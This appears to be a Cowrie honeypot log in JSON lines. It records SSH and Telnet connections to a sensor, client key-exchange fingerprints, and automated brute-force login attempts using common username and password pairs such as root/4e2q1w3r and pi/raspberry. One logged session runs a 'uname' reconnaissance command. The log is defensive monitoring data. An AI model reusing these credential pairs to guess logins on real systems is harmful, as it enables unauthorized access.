{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:49:41.663947Z","src_ip":"212.227.235.229","session":"d61a8ea76196"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:49:42.020362Z","src_ip":"212.227.125.160","session":"eb2d47582434"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:49:47.512505Z","src_ip":"212.227.125.160","session":"10c023b4e088"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54200,"dst_ip":"1.2.3.4","dst_port":22,"session":"6543a99f8c59","protocol":"ssh","message":"New connection: 41.226.27.251:54200 (1.2.3.4:22) [session: 6543a99f8c59]","sensor":"my-vps","timestamp":"2025-08-31T02:49:48.136062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:49:48.194899Z","src_ip":"41.226.27.251","session":"6543a99f8c59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:49:48.195893Z","src_ip":"41.226.27.251","session":"6543a99f8c59"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:49:48.373611Z","src_ip":"41.226.27.251","session":"6543a99f8c59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:49:48.486954Z","src_ip":"41.226.27.251","session":"6543a99f8c59"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:49:48.487864Z","src_ip":"41.226.27.251","session":"6543a99f8c59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:49:48.533630Z","src_ip":"41.226.27.251","session":"6543a99f8c59"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:49:48.534847Z","src_ip":"41.226.27.251","session":"6543a99f8c59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50240,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6422b0417a9","protocol":"ssh","message":"New connection: 212.227.125.160:50240 (1.2.3.4:22) [session: b6422b0417a9]","sensor":"my-vps","timestamp":"2025-08-31T02:49:50.846971Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":51084,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6c43d061b4d","protocol":"ssh","message":"New connection: 41.226.27.251:51084 (1.2.3.4:22) [session: d6c43d061b4d]","sensor":"my-vps","timestamp":"2025-08-31T02:50:08.105040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:50:08.231947Z","src_ip":"41.226.27.251","session":"d6c43d061b4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:50:08.232878Z","src_ip":"41.226.27.251","session":"d6c43d061b4d"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:50:08.432526Z","src_ip":"41.226.27.251","session":"d6c43d061b4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46198,"dst_ip":"1.2.3.4","dst_port":22,"session":"b36f8214b3b4","protocol":"ssh","message":"New connection: 212.227.235.229:46198 (1.2.3.4:22) [session: b36f8214b3b4]","sensor":"my-vps","timestamp":"2025-08-31T02:50:09.504839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:50:09.505759Z","src_ip":"212.227.235.229","session":"b36f8214b3b4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:09.714010Z","src_ip":"41.226.27.251","session":"d6c43d061b4d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T02:50:09.750183Z","src_ip":"212.227.235.229","session":"b36f8214b3b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57956,"dst_ip":"1.2.3.4","dst_port":22,"session":"877ca0982b6a","protocol":"ssh","message":"New connection: 212.227.235.229:57956 (1.2.3.4:22) [session: 877ca0982b6a]","sensor":"my-vps","timestamp":"2025-08-31T02:50:16.561857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:50:17.347317Z","src_ip":"212.227.235.229","session":"877ca0982b6a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:50:17.349496Z","src_ip":"212.227.235.229","session":"877ca0982b6a"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:17.504875Z","src_ip":"212.227.235.229","session":"b36f8214b3b4"}
{"eventid":"cowrie.session.closed","duration":"83.2","message":"Connection lost after 83.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:18.802067Z","src_ip":"212.227.125.160","session":"10c023b4e088"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"admin123","message":"login attempt [ftptest/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:50:23.242356Z","src_ip":"212.227.235.229","session":"877ca0982b6a"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:25.048382Z","src_ip":"212.227.235.229","session":"877ca0982b6a"}
{"eventid":"cowrie.session.closed","duration":"34.5","message":"Connection lost after 34.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:25.310089Z","src_ip":"212.227.125.160","session":"b6422b0417a9"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":47728,"dst_ip":"1.2.3.4","dst_port":22,"session":"0360c1f31b6a","protocol":"ssh","message":"New connection: 41.226.27.251:47728 (1.2.3.4:22) [session: 0360c1f31b6a]","sensor":"my-vps","timestamp":"2025-08-31T02:50:28.392148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:50:28.392930Z","src_ip":"41.226.27.251","session":"0360c1f31b6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:50:28.441213Z","src_ip":"41.226.27.251","session":"0360c1f31b6a"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"12345678","message":"login attempt [gitlab/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:50:28.584629Z","src_ip":"41.226.27.251","session":"0360c1f31b6a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:29.789985Z","src_ip":"41.226.27.251","session":"0360c1f31b6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48434,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f4bb19a8c1b","protocol":"ssh","message":"New connection: 212.227.125.160:48434 (1.2.3.4:22) [session: 8f4bb19a8c1b]","sensor":"my-vps","timestamp":"2025-08-31T02:50:37.491269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:50:38.191238Z","src_ip":"212.227.125.160","session":"8f4bb19a8c1b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:50:38.191926Z","src_ip":"212.227.125.160","session":"8f4bb19a8c1b"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"admin123","message":"login attempt [ftptest/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:50:40.355703Z","src_ip":"212.227.125.160","session":"8f4bb19a8c1b"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:41.784106Z","src_ip":"212.227.125.160","session":"8f4bb19a8c1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54258,"dst_ip":"1.2.3.4","dst_port":22,"session":"c56f58367962","protocol":"ssh","message":"New connection: 212.227.235.229:54258 (1.2.3.4:22) [session: c56f58367962]","sensor":"my-vps","timestamp":"2025-08-31T02:50:44.998220Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34486,"dst_ip":"1.2.3.4","dst_port":22,"session":"29c56f1bb4b1","protocol":"ssh","message":"New connection: 41.226.27.251:34486 (1.2.3.4:22) [session: 29c56f1bb4b1]","sensor":"my-vps","timestamp":"2025-08-31T02:50:48.658417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:50:48.675240Z","src_ip":"41.226.27.251","session":"29c56f1bb4b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:50:48.705918Z","src_ip":"41.226.27.251","session":"29c56f1bb4b1"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-31T02:50:48.894255Z","src_ip":"41.226.27.251","session":"29c56f1bb4b1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:50.113880Z","src_ip":"41.226.27.251","session":"29c56f1bb4b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46974,"dst_ip":"1.2.3.4","dst_port":22,"session":"67f5fc07075d","protocol":"ssh","message":"New connection: 212.227.235.229:46974 (1.2.3.4:22) [session: 67f5fc07075d]","sensor":"my-vps","timestamp":"2025-08-31T02:50:54.573633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:50:54.574806Z","src_ip":"212.227.235.229","session":"67f5fc07075d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:50:54.826482Z","src_ip":"212.227.235.229","session":"67f5fc07075d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-31T02:50:55.582055Z","src_ip":"212.227.235.229","session":"67f5fc07075d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:50:56.835874Z","src_ip":"212.227.235.229","session":"67f5fc07075d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46230,"dst_ip":"1.2.3.4","dst_port":23,"session":"3c52f6cc464d","protocol":"telnet","message":"New connection: 212.227.125.160:46230 (1.2.3.4:23) [session: 3c52f6cc464d]","sensor":"my-vps","timestamp":"2025-08-31T02:50:56.894603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:50:57.613433Z","src_ip":"212.227.235.229","session":"c56f58367962"}
